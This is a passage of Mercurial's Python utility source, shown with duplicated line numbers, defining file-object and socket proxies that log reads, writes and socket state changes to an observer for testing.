530 # Call the original object.
531 orig = object.__getattribute__(self, '_orig')
531 orig = object.__getattribute__(self, '_orig')
532 res = getattr(orig, name)(*args, **kwargs)
532 res = getattr(orig, name)(*args, **kwargs)
533
533
534 # Call a method on the observer of the same name with arguments
534 # Call a method on the observer of the same name with arguments
535 # so it can react, log, etc.
535 # so it can react, log, etc.
536 observer = object.__getattribute__(self, '_observer')
536 observer = object.__getattribute__(self, '_observer')
537 fn = getattr(observer, name, None)
537 fn = getattr(observer, name, None)
538 if fn:
538 if fn:
539 fn(res, *args, **kwargs)
539 fn(res, *args, **kwargs)
540
540
541 return res
541 return res
542
542
543 def close(self, *args, **kwargs):
543 def close(self, *args, **kwargs):
544 return object.__getattribute__(self, '_observedcall')(
544 return object.__getattribute__(self, '_observedcall')(
545 'close', *args, **kwargs
545 'close', *args, **kwargs
546 )
546 )
547
547
548 def fileno(self, *args, **kwargs):
548 def fileno(self, *args, **kwargs):
549 return object.__getattribute__(self, '_observedcall')(
549 return object.__getattribute__(self, '_observedcall')(
550 'fileno', *args, **kwargs
550 'fileno', *args, **kwargs
551 )
551 )
552
552
553 def flush(self, *args, **kwargs):
553 def flush(self, *args, **kwargs):
554 return object.__getattribute__(self, '_observedcall')(
554 return object.__getattribute__(self, '_observedcall')(
555 'flush', *args, **kwargs
555 'flush', *args, **kwargs
556 )
556 )
557
557
558 def isatty(self, *args, **kwargs):
558 def isatty(self, *args, **kwargs):
559 return object.__getattribute__(self, '_observedcall')(
559 return object.__getattribute__(self, '_observedcall')(
560 'isatty', *args, **kwargs
560 'isatty', *args, **kwargs
561 )
561 )
562
562
563 def readable(self, *args, **kwargs):
563 def readable(self, *args, **kwargs):
564 return object.__getattribute__(self, '_observedcall')(
564 return object.__getattribute__(self, '_observedcall')(
565 'readable', *args, **kwargs
565 'readable', *args, **kwargs
566 )
566 )
567
567
568 def readline(self, *args, **kwargs):
568 def readline(self, *args, **kwargs):
569 return object.__getattribute__(self, '_observedcall')(
569 return object.__getattribute__(self, '_observedcall')(
570 'readline', *args, **kwargs
570 'readline', *args, **kwargs
571 )
571 )
572
572
573 def readlines(self, *args, **kwargs):
573 def readlines(self, *args, **kwargs):
574 return object.__getattribute__(self, '_observedcall')(
574 return object.__getattribute__(self, '_observedcall')(
575 'readlines', *args, **kwargs
575 'readlines', *args, **kwargs
576 )
576 )
577
577
578 def seek(self, *args, **kwargs):
578 def seek(self, *args, **kwargs):
579 return object.__getattribute__(self, '_observedcall')(
579 return object.__getattribute__(self, '_observedcall')(
580 'seek', *args, **kwargs
580 'seek', *args, **kwargs
581 )
581 )
582
582
583 def seekable(self, *args, **kwargs):
583 def seekable(self, *args, **kwargs):
584 return object.__getattribute__(self, '_observedcall')(
584 return object.__getattribute__(self, '_observedcall')(
585 'seekable', *args, **kwargs
585 'seekable', *args, **kwargs
586 )
586 )
587
587
588 def tell(self, *args, **kwargs):
588 def tell(self, *args, **kwargs):
589 return object.__getattribute__(self, '_observedcall')(
589 return object.__getattribute__(self, '_observedcall')(
590 'tell', *args, **kwargs
590 'tell', *args, **kwargs
591 )
591 )
592
592
593 def truncate(self, *args, **kwargs):
593 def truncate(self, *args, **kwargs):
594 return object.__getattribute__(self, '_observedcall')(
594 return object.__getattribute__(self, '_observedcall')(
595 'truncate', *args, **kwargs
595 'truncate', *args, **kwargs
596 )
596 )
597
597
598 def writable(self, *args, **kwargs):
598 def writable(self, *args, **kwargs):
599 return object.__getattribute__(self, '_observedcall')(
599 return object.__getattribute__(self, '_observedcall')(
600 'writable', *args, **kwargs
600 'writable', *args, **kwargs
601 )
601 )
602
602
603 def writelines(self, *args, **kwargs):
603 def writelines(self, *args, **kwargs):
604 return object.__getattribute__(self, '_observedcall')(
604 return object.__getattribute__(self, '_observedcall')(
605 'writelines', *args, **kwargs
605 'writelines', *args, **kwargs
606 )
606 )
607
607
608 def read(self, *args, **kwargs):
608 def read(self, *args, **kwargs):
609 return object.__getattribute__(self, '_observedcall')(
609 return object.__getattribute__(self, '_observedcall')(
610 'read', *args, **kwargs
610 'read', *args, **kwargs
611 )
611 )
612
612
613 def readall(self, *args, **kwargs):
613 def readall(self, *args, **kwargs):
614 return object.__getattribute__(self, '_observedcall')(
614 return object.__getattribute__(self, '_observedcall')(
615 'readall', *args, **kwargs
615 'readall', *args, **kwargs
616 )
616 )
617
617
618 def readinto(self, *args, **kwargs):
618 def readinto(self, *args, **kwargs):
619 return object.__getattribute__(self, '_observedcall')(
619 return object.__getattribute__(self, '_observedcall')(
620 'readinto', *args, **kwargs
620 'readinto', *args, **kwargs
621 )
621 )
622
622
623 def write(self, *args, **kwargs):
623 def write(self, *args, **kwargs):
624 return object.__getattribute__(self, '_observedcall')(
624 return object.__getattribute__(self, '_observedcall')(
625 'write', *args, **kwargs
625 'write', *args, **kwargs
626 )
626 )
627
627
628 def detach(self, *args, **kwargs):
628 def detach(self, *args, **kwargs):
629 return object.__getattribute__(self, '_observedcall')(
629 return object.__getattribute__(self, '_observedcall')(
630 'detach', *args, **kwargs
630 'detach', *args, **kwargs
631 )
631 )
632
632
633 def read1(self, *args, **kwargs):
633 def read1(self, *args, **kwargs):
634 return object.__getattribute__(self, '_observedcall')(
634 return object.__getattribute__(self, '_observedcall')(
635 'read1', *args, **kwargs
635 'read1', *args, **kwargs
636 )
636 )
637
637
638
638
639 class observedbufferedinputpipe(bufferedinputpipe):
639 class observedbufferedinputpipe(bufferedinputpipe):
640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
641
641
642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
643 bypass ``fileobjectproxy``. Because of this, we need to make
643 bypass ``fileobjectproxy``. Because of this, we need to make
644 ``bufferedinputpipe`` aware of these operations.
644 ``bufferedinputpipe`` aware of these operations.
645
645
646 This variation of ``bufferedinputpipe`` can notify observers about
646 This variation of ``bufferedinputpipe`` can notify observers about
647 ``os.read()`` events. It also re-publishes other events, such as
647 ``os.read()`` events. It also re-publishes other events, such as
648 ``read()`` and ``readline()``.
648 ``read()`` and ``readline()``.
649 """
649 """
650
650
651 def _fillbuffer(self):
651 def _fillbuffer(self):
652 res = super(observedbufferedinputpipe, self)._fillbuffer()
652 res = super(observedbufferedinputpipe, self)._fillbuffer()
653
653
654 fn = getattr(self._input._observer, 'osread', None)
654 fn = getattr(self._input._observer, 'osread', None)
655 if fn:
655 if fn:
656 fn(res, _chunksize)
656 fn(res, _chunksize)
657
657
658 return res
658 return res
659
659
660 # We use different observer methods because the operation isn't
660 # We use different observer methods because the operation isn't
661 # performed on the actual file object but on us.
661 # performed on the actual file object but on us.
662 def read(self, size):
662 def read(self, size):
663 res = super(observedbufferedinputpipe, self).read(size)
663 res = super(observedbufferedinputpipe, self).read(size)
664
664
665 fn = getattr(self._input._observer, 'bufferedread', None)
665 fn = getattr(self._input._observer, 'bufferedread', None)
666 if fn:
666 if fn:
667 fn(res, size)
667 fn(res, size)
668
668
669 return res
669 return res
670
670
671 def readline(self, *args, **kwargs):
671 def readline(self, *args, **kwargs):
672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
673
673
674 fn = getattr(self._input._observer, 'bufferedreadline', None)
674 fn = getattr(self._input._observer, 'bufferedreadline', None)
675 if fn:
675 if fn:
676 fn(res)
676 fn(res)
677
677
678 return res
678 return res
679
679
680
680
681 PROXIED_SOCKET_METHODS = {
681 PROXIED_SOCKET_METHODS = {
682 'makefile',
682 'makefile',
683 'recv',
683 'recv',
684 'recvfrom',
684 'recvfrom',
685 'recvfrom_into',
685 'recvfrom_into',
686 'recv_into',
686 'recv_into',
687 'send',
687 'send',
688 'sendall',
688 'sendall',
689 'sendto',
689 'sendto',
690 'setblocking',
690 'setblocking',
691 'settimeout',
691 'settimeout',
692 'gettimeout',
692 'gettimeout',
693 'setsockopt',
693 'setsockopt',
694 }
694 }
695
695
696
696
697 class socketproxy(object):
697 class socketproxy(object):
698 """A proxy around a socket that tells a watcher when events occur.
698 """A proxy around a socket that tells a watcher when events occur.
699
699
700 This is like ``fileobjectproxy`` except for sockets.
700 This is like ``fileobjectproxy`` except for sockets.
701
701
702 This type is intended to only be used for testing purposes. Think hard
702 This type is intended to only be used for testing purposes. Think hard
703 before using it in important code.
703 before using it in important code.
704 """
704 """
705
705
706 __slots__ = (
706 __slots__ = (
707 '_orig',
707 '_orig',
708 '_observer',
708 '_observer',
709 )
709 )
710
710
711 def __init__(self, sock, observer):
711 def __init__(self, sock, observer):
712 object.__setattr__(self, '_orig', sock)
712 object.__setattr__(self, '_orig', sock)
713 object.__setattr__(self, '_observer', observer)
713 object.__setattr__(self, '_observer', observer)
714
714
715 def __getattribute__(self, name):
715 def __getattribute__(self, name):
716 if name in PROXIED_SOCKET_METHODS:
716 if name in PROXIED_SOCKET_METHODS:
717 return object.__getattribute__(self, name)
717 return object.__getattribute__(self, name)
718
718
719 return getattr(object.__getattribute__(self, '_orig'), name)
719 return getattr(object.__getattribute__(self, '_orig'), name)
720
720
721 def __delattr__(self, name):
721 def __delattr__(self, name):
722 return delattr(object.__getattribute__(self, '_orig'), name)
722 return delattr(object.__getattribute__(self, '_orig'), name)
723
723
724 def __setattr__(self, name, value):
724 def __setattr__(self, name, value):
725 return setattr(object.__getattribute__(self, '_orig'), name, value)
725 return setattr(object.__getattribute__(self, '_orig'), name, value)
726
726
727 def __nonzero__(self):
727 def __nonzero__(self):
728 return bool(object.__getattribute__(self, '_orig'))
728 return bool(object.__getattribute__(self, '_orig'))
729
729
730 __bool__ = __nonzero__
730 __bool__ = __nonzero__
731
731
732 def _observedcall(self, name, *args, **kwargs):
732 def _observedcall(self, name, *args, **kwargs):
733 # Call the original object.
733 # Call the original object.
734 orig = object.__getattribute__(self, '_orig')
734 orig = object.__getattribute__(self, '_orig')
735 res = getattr(orig, name)(*args, **kwargs)
735 res = getattr(orig, name)(*args, **kwargs)
736
736
737 # Call a method on the observer of the same name with arguments
737 # Call a method on the observer of the same name with arguments
738 # so it can react, log, etc.
738 # so it can react, log, etc.
739 observer = object.__getattribute__(self, '_observer')
739 observer = object.__getattribute__(self, '_observer')
740 fn = getattr(observer, name, None)
740 fn = getattr(observer, name, None)
741 if fn:
741 if fn:
742 fn(res, *args, **kwargs)
742 fn(res, *args, **kwargs)
743
743
744 return res
744 return res
745
745
746 def makefile(self, *args, **kwargs):
746 def makefile(self, *args, **kwargs):
747 res = object.__getattribute__(self, '_observedcall')(
747 res = object.__getattribute__(self, '_observedcall')(
748 'makefile', *args, **kwargs
748 'makefile', *args, **kwargs
749 )
749 )
750
750
751 # The file object may be used for I/O. So we turn it into a
751 # The file object may be used for I/O. So we turn it into a
752 # proxy using our observer.
752 # proxy using our observer.
753 observer = object.__getattribute__(self, '_observer')
753 observer = object.__getattribute__(self, '_observer')
754 return makeloggingfileobject(
754 return makeloggingfileobject(
755 observer.fh,
755 observer.fh,
756 res,
756 res,
757 observer.name,
757 observer.name,
758 reads=observer.reads,
758 reads=observer.reads,
759 writes=observer.writes,
759 writes=observer.writes,
760 logdata=observer.logdata,
760 logdata=observer.logdata,
761 logdataapis=observer.logdataapis,
761 logdataapis=observer.logdataapis,
762 )
762 )
763
763
764 def recv(self, *args, **kwargs):
764 def recv(self, *args, **kwargs):
765 return object.__getattribute__(self, '_observedcall')(
765 return object.__getattribute__(self, '_observedcall')(
766 'recv', *args, **kwargs
766 'recv', *args, **kwargs
767 )
767 )
768
768
769 def recvfrom(self, *args, **kwargs):
769 def recvfrom(self, *args, **kwargs):
770 return object.__getattribute__(self, '_observedcall')(
770 return object.__getattribute__(self, '_observedcall')(
771 'recvfrom', *args, **kwargs
771 'recvfrom', *args, **kwargs
772 )
772 )
773
773
774 def recvfrom_into(self, *args, **kwargs):
774 def recvfrom_into(self, *args, **kwargs):
775 return object.__getattribute__(self, '_observedcall')(
775 return object.__getattribute__(self, '_observedcall')(
776 'recvfrom_into', *args, **kwargs
776 'recvfrom_into', *args, **kwargs
777 )
777 )
778
778
779 def recv_into(self, *args, **kwargs):
779 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, '_observedcall')(
780 return object.__getattribute__(self, '_observedcall')(
781 'recv_into', *args, **kwargs
781 'recv_into', *args, **kwargs
782 )
782 )
783
783
784 def send(self, *args, **kwargs):
784 def send(self, *args, **kwargs):
785 return object.__getattribute__(self, '_observedcall')(
785 return object.__getattribute__(self, '_observedcall')(
786 'send', *args, **kwargs
786 'send', *args, **kwargs
787 )
787 )
788
788
789 def sendall(self, *args, **kwargs):
789 def sendall(self, *args, **kwargs):
790 return object.__getattribute__(self, '_observedcall')(
790 return object.__getattribute__(self, '_observedcall')(
791 'sendall', *args, **kwargs
791 'sendall', *args, **kwargs
792 )
792 )
793
793
794 def sendto(self, *args, **kwargs):
794 def sendto(self, *args, **kwargs):
795 return object.__getattribute__(self, '_observedcall')(
795 return object.__getattribute__(self, '_observedcall')(
796 'sendto', *args, **kwargs
796 'sendto', *args, **kwargs
797 )
797 )
798
798
799 def setblocking(self, *args, **kwargs):
799 def setblocking(self, *args, **kwargs):
800 return object.__getattribute__(self, '_observedcall')(
800 return object.__getattribute__(self, '_observedcall')(
801 'setblocking', *args, **kwargs
801 'setblocking', *args, **kwargs
802 )
802 )
803
803
804 def settimeout(self, *args, **kwargs):
804 def settimeout(self, *args, **kwargs):
805 return object.__getattribute__(self, '_observedcall')(
805 return object.__getattribute__(self, '_observedcall')(
806 'settimeout', *args, **kwargs
806 'settimeout', *args, **kwargs
807 )
807 )
808
808
809 def gettimeout(self, *args, **kwargs):
809 def gettimeout(self, *args, **kwargs):
810 return object.__getattribute__(self, '_observedcall')(
810 return object.__getattribute__(self, '_observedcall')(
811 'gettimeout', *args, **kwargs
811 'gettimeout', *args, **kwargs
812 )
812 )
813
813
814 def setsockopt(self, *args, **kwargs):
814 def setsockopt(self, *args, **kwargs):
815 return object.__getattribute__(self, '_observedcall')(
815 return object.__getattribute__(self, '_observedcall')(
816 'setsockopt', *args, **kwargs
816 'setsockopt', *args, **kwargs
817 )
817 )
818
818
819
819
820 class baseproxyobserver(object):
820 class baseproxyobserver(object):
821 def __init__(self, fh, name, logdata, logdataapis):
821 def __init__(self, fh, name, logdata, logdataapis):
822 self.fh = fh
822 self.fh = fh
823 self.name = name
823 self.name = name
824 self.logdata = logdata
824 self.logdata = logdata
825 self.logdataapis = logdataapis
825 self.logdataapis = logdataapis
826
826
827 def _writedata(self, data):
827 def _writedata(self, data):
828 if not self.logdata:
828 if not self.logdata:
829 if self.logdataapis:
829 if self.logdataapis:
830 self.fh.write(b'\n')
830 self.fh.write(b'\n')
831 self.fh.flush()
831 self.fh.flush()
832 return
832 return
833
833
834 # Simple case writes all data on a single line.
834 # Simple case writes all data on a single line.
835 if b'\n' not in data:
835 if b'\n' not in data:
836 if self.logdataapis:
836 if self.logdataapis:
837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
838 else:
838 else:
839 self.fh.write(
839 self.fh.write(
840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
841 )
841 )
842 self.fh.flush()
842 self.fh.flush()
843 return
843 return
844
844
845 # Data with newlines is written to multiple lines.
845 # Data with newlines is written to multiple lines.
846 if self.logdataapis:
846 if self.logdataapis:
847 self.fh.write(b':\n')
847 self.fh.write(b':\n')
848
848
849 lines = data.splitlines(True)
849 lines = data.splitlines(True)
850 for line in lines:
850 for line in lines:
851 self.fh.write(
851 self.fh.write(
852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
853 )
853 )
854 self.fh.flush()
854 self.fh.flush()
855
855
856
856
857 class fileobjectobserver(baseproxyobserver):
857 class fileobjectobserver(baseproxyobserver):
858 """Logs file object activity."""
858 """Logs file object activity."""
859
859
860 def __init__(
860 def __init__(
861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
862 ):
862 ):
863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
864 self.reads = reads
864 self.reads = reads
865 self.writes = writes
865 self.writes = writes
866
866
867 def read(self, res, size=-1):
867 def read(self, res, size=-1):
868 if not self.reads:
868 if not self.reads:
869 return
869 return
870 # Python 3 can return None from reads at EOF instead of empty strings.
870 # Python 3 can return None from reads at EOF instead of empty strings.
871 if res is None:
871 if res is None:
872 res = b''
872 res = b''
873
873
874 if size == -1 and res == b'':
874 if size == -1 and res == b'':
875 # Suppress pointless read(-1) calls that return
875 # Suppress pointless read(-1) calls that return
876 # nothing. These happen _a lot_ on Python 3, and there
876 # nothing. These happen _a lot_ on Python 3, and there
877 # doesn't seem to be a better workaround to have matching
877 # doesn't seem to be a better workaround to have matching
878 # Python 2 and 3 behavior. :(
878 # Python 2 and 3 behavior. :(
879 return
879 return
880
880
881 if self.logdataapis:
881 if self.logdataapis:
882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
883
883
884 self._writedata(res)
884 self._writedata(res)
885
885
886 def readline(self, res, limit=-1):
886 def readline(self, res, limit=-1):
887 if not self.reads:
887 if not self.reads:
888 return
888 return
889
889
890 if self.logdataapis:
890 if self.logdataapis:
891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
892
892
893 self._writedata(res)
893 self._writedata(res)
894
894
895 def readinto(self, res, dest):
895 def readinto(self, res, dest):
896 if not self.reads:
896 if not self.reads:
897 return
897 return
898
898
899 if self.logdataapis:
899 if self.logdataapis:
900 self.fh.write(
900 self.fh.write(
901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
902 )
902 )
903
903
904 data = dest[0:res] if res is not None else b''
904 data = dest[0:res] if res is not None else b''
905
905
906 # _writedata() uses "in" operator and is confused by memoryview because
906 # _writedata() uses "in" operator and is confused by memoryview because
907 # characters are ints on Python 3.
907 # characters are ints on Python 3.
908 if isinstance(data, memoryview):
908 if isinstance(data, memoryview):
909 data = data.tobytes()
909 data = data.tobytes()
910
910
911 self._writedata(data)
911 self._writedata(data)
912
912
913 def write(self, res, data):
913 def write(self, res, data):
914 if not self.writes:
914 if not self.writes:
915 return
915 return
916
916
917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
918 # returns the integer bytes written.
918 # returns the integer bytes written.
919 if res is None and data:
919 if res is None and data:
920 res = len(data)
920 res = len(data)
921
921
922 if self.logdataapis:
922 if self.logdataapis:
923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
924
924
925 self._writedata(data)
925 self._writedata(data)
926
926
927 def flush(self, res):
927 def flush(self, res):
928 if not self.writes:
928 if not self.writes:
929 return
929 return
930
930
931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
932
932
933 # For observedbufferedinputpipe.
933 # For observedbufferedinputpipe.
934 def bufferedread(self, res, size):
934 def bufferedread(self, res, size):
935 if not self.reads:
935 if not self.reads:
936 return
936 return
937
937
938 if self.logdataapis:
938 if self.logdataapis:
939 self.fh.write(
939 self.fh.write(
940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
941 )
941 )
942
942
943 self._writedata(res)
943 self._writedata(res)
944
944
945 def bufferedreadline(self, res):
945 def bufferedreadline(self, res):
946 if not self.reads:
946 if not self.reads:
947 return
947 return
948
948
949 if self.logdataapis:
949 if self.logdataapis:
950 self.fh.write(
950 self.fh.write(
951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
952 )
952 )
953
953
954 self._writedata(res)
954 self._writedata(res)
955
955
956
956
957 def makeloggingfileobject(
957 def makeloggingfileobject(
958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
959 ):
959 ):
960 """Turn a file object into a logging file object."""
960 """Turn a file object into a logging file object."""
961
961
962 observer = fileobjectobserver(
962 observer = fileobjectobserver(
963 logh,
963 logh,
964 name,
964 name,
965 reads=reads,
965 reads=reads,
966 writes=writes,
966 writes=writes,
967 logdata=logdata,
967 logdata=logdata,
968 logdataapis=logdataapis,
968 logdataapis=logdataapis,
969 )
969 )
970 return fileobjectproxy(fh, observer)
970 return fileobjectproxy(fh, observer)
971
971
972
972
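# Hedged sketch (not part of the original module): makeloggingfileobject()
# wraps a file object so observed read/write calls are mirrored to a log
# handle. The BytesIO handles and the b'example' label are invented here.
def _makeloggingfileobject_example():
    import io

    log = io.BytesIO()
    proxied = makeloggingfileobject(
        log, io.BytesIO(b'payload'), b'example', logdata=True
    )
    proxied.read(4)
    return log.getvalue()  # b'example> read(4) -> 4: payl\n'
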
973 class socketobserver(baseproxyobserver):
973 class socketobserver(baseproxyobserver):
974 """Logs socket activity."""
974 """Logs socket activity."""
975
975
976 def __init__(
976 def __init__(
977 self,
977 self,
978 fh,
978 fh,
979 name,
979 name,
980 reads=True,
980 reads=True,
981 writes=True,
981 writes=True,
982 states=True,
982 states=True,
983 logdata=False,
983 logdata=False,
984 logdataapis=True,
984 logdataapis=True,
985 ):
985 ):
986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
987 self.reads = reads
987 self.reads = reads
988 self.writes = writes
988 self.writes = writes
989 self.states = states
989 self.states = states
990
990
991 def makefile(self, res, mode=None, bufsize=None):
991 def makefile(self, res, mode=None, bufsize=None):
992 if not self.states:
992 if not self.states:
993 return
993 return
994
994
995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
996
996
997 def recv(self, res, size, flags=0):
997 def recv(self, res, size, flags=0):
998 if not self.reads:
998 if not self.reads:
999 return
999 return
1000
1000
1001 if self.logdataapis:
1001 if self.logdataapis:
1002 self.fh.write(
1002 self.fh.write(
1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1004 )
1004 )
1005 self._writedata(res)
1005 self._writedata(res)
1006
1006
1007 def recvfrom(self, res, size, flags=0):
1007 def recvfrom(self, res, size, flags=0):
1008 if not self.reads:
1008 if not self.reads:
1009 return
1009 return
1010
1010
1011 if self.logdataapis:
1011 if self.logdataapis:
1012 self.fh.write(
1012 self.fh.write(
1013 b'%s> recvfrom(%d, %d) -> %d'
1013 b'%s> recvfrom(%d, %d) -> %d'
1014 % (self.name, size, flags, len(res[0]))
1014 % (self.name, size, flags, len(res[0]))
1015 )
1015 )
1016
1016
1017 self._writedata(res[0])
1017 self._writedata(res[0])
1018
1018
1019 def recvfrom_into(self, res, buf, size, flags=0):
1019 def recvfrom_into(self, res, buf, size, flags=0):
1020 if not self.reads:
1020 if not self.reads:
1021 return
1021 return
1022
1022
1023 if self.logdataapis:
1023 if self.logdataapis:
1024 self.fh.write(
1024 self.fh.write(
1025 b'%s> recvfrom_into(%d, %d) -> %d'
1025 b'%s> recvfrom_into(%d, %d) -> %d'
1026 % (self.name, size, flags, res[0])
1026 % (self.name, size, flags, res[0])
1027 )
1027 )
1028
1028
1029 self._writedata(buf[0 : res[0]])
1029 self._writedata(buf[0 : res[0]])
1030
1030
1031 def recv_into(self, res, buf, size=0, flags=0):
1031 def recv_into(self, res, buf, size=0, flags=0):
1032 if not self.reads:
1032 if not self.reads:
1033 return
1033 return
1034
1034
1035 if self.logdataapis:
1035 if self.logdataapis:
1036 self.fh.write(
1036 self.fh.write(
1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1038 )
1038 )
1039
1039
1040 self._writedata(buf[0:res])
1040 self._writedata(buf[0:res])
1041
1041
1042 def send(self, res, data, flags=0):
1042 def send(self, res, data, flags=0):
1043 if not self.writes:
1043 if not self.writes:
1044 return
1044 return
1045
1045
1046 self.fh.write(
1046 self.fh.write(
1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1048 )
1048 )
1049 self._writedata(data)
1049 self._writedata(data)
1050
1050
1051 def sendall(self, res, data, flags=0):
1051 def sendall(self, res, data, flags=0):
1052 if not self.writes:
1052 if not self.writes:
1053 return
1053 return
1054
1054
1055 if self.logdataapis:
1055 if self.logdataapis:
1056 # Returns None on success. So don't bother reporting return value.
1056 # Returns None on success. So don't bother reporting return value.
1057 self.fh.write(
1057 self.fh.write(
1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1059 )
1059 )
1060
1060
1061 self._writedata(data)
1061 self._writedata(data)
1062
1062
1063 def sendto(self, res, data, flagsoraddress, address=None):
1063 def sendto(self, res, data, flagsoraddress, address=None):
1064 if not self.writes:
1064 if not self.writes:
1065 return
1065 return
1066
1066
1067 if address:
1067 if address:
1068 flags = flagsoraddress
1068 flags = flagsoraddress
1069 else:
1069 else:
1070 flags = 0
1070 flags = 0
1071
1071
1072 if self.logdataapis:
1072 if self.logdataapis:
1073 self.fh.write(
1073 self.fh.write(
1074 b'%s> sendto(%d, %d, %r) -> %d'
1074 b'%s> sendto(%d, %d, %r) -> %d'
1075 % (self.name, len(data), flags, address, res)
1075 % (self.name, len(data), flags, address, res)
1076 )
1076 )
1077
1077
1078 self._writedata(data)
1078 self._writedata(data)
1079
1079
1080 def setblocking(self, res, flag):
1080 def setblocking(self, res, flag):
1081 if not self.states:
1081 if not self.states:
1082 return
1082 return
1083
1083
1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1085
1085
1086 def settimeout(self, res, value):
1086 def settimeout(self, res, value):
1087 if not self.states:
1087 if not self.states:
1088 return
1088 return
1089
1089
1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1091
1091
1092 def gettimeout(self, res):
1092 def gettimeout(self, res):
1093 if not self.states:
1093 if not self.states:
1094 return
1094 return
1095
1095
1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1097
1097
1098 def setsockopt(self, res, level, optname, value):
1098 def setsockopt(self, res, level, optname, value):
1099 if not self.states:
1099 if not self.states:
1100 return
1100 return
1101
1101
1102 self.fh.write(
1102 self.fh.write(
1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1104 % (self.name, level, optname, value, res)
1104 % (self.name, level, optname, value, res)
1105 )
1105 )
1106
1106
1107
1107
1108 def makeloggingsocket(
1108 def makeloggingsocket(
1109 logh,
1109 logh,
1110 fh,
1110 fh,
1111 name,
1111 name,
1112 reads=True,
1112 reads=True,
1113 writes=True,
1113 writes=True,
1114 states=True,
1114 states=True,
1115 logdata=False,
1115 logdata=False,
1116 logdataapis=True,
1116 logdataapis=True,
1117 ):
1117 ):
1118 """Turn a socket into a logging socket."""
1118 """Turn a socket into a logging socket."""
1119
1119
1120 observer = socketobserver(
1120 observer = socketobserver(
1121 logh,
1121 logh,
1122 name,
1122 name,
1123 reads=reads,
1123 reads=reads,
1124 writes=writes,
1124 writes=writes,
1125 states=states,
1125 states=states,
1126 logdata=logdata,
1126 logdata=logdata,
1127 logdataapis=logdataapis,
1127 logdataapis=logdataapis,
1128 )
1128 )
1129 return socketproxy(fh, observer)
1129 return socketproxy(fh, observer)
1130
1130
1131
1131
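# Hedged sketch (not part of the original module): makeloggingsocket() mirrors
# socket traffic to a log handle. socketpair() and the b'client' label are only
# used to keep the illustration self-contained; socketpair may be unavailable
# on some platforms.
def _makeloggingsocket_example():
    import io
    import socket

    s1, s2 = socket.socketpair()
    try:
        logged = makeloggingsocket(io.BytesIO(), s1, b'client', logdata=True)
        logged.sendall(b'ping')
        return s2.recv(4)  # b'ping'
    finally:
        s1.close()
        s2.close()
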
1132 def version():
1132 def version():
1133 """Return version information if available."""
1133 """Return version information if available."""
1134 try:
1134 try:
1135 from . import __version__
1135 from . import __version__
1136
1136
1137 return __version__.version
1137 return __version__.version
1138 except ImportError:
1138 except ImportError:
1139 return b'unknown'
1139 return b'unknown'
1140
1140
1141
1141
1142 def versiontuple(v=None, n=4):
1142 def versiontuple(v=None, n=4):
1143 """Parses a Mercurial version string into an N-tuple.
1143 """Parses a Mercurial version string into an N-tuple.
1144
1144
1145 The version string to be parsed is specified with the ``v`` argument.
1145 The version string to be parsed is specified with the ``v`` argument.
1146 If it isn't defined, the current Mercurial version string will be parsed.
1146 If it isn't defined, the current Mercurial version string will be parsed.
1147
1147
1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
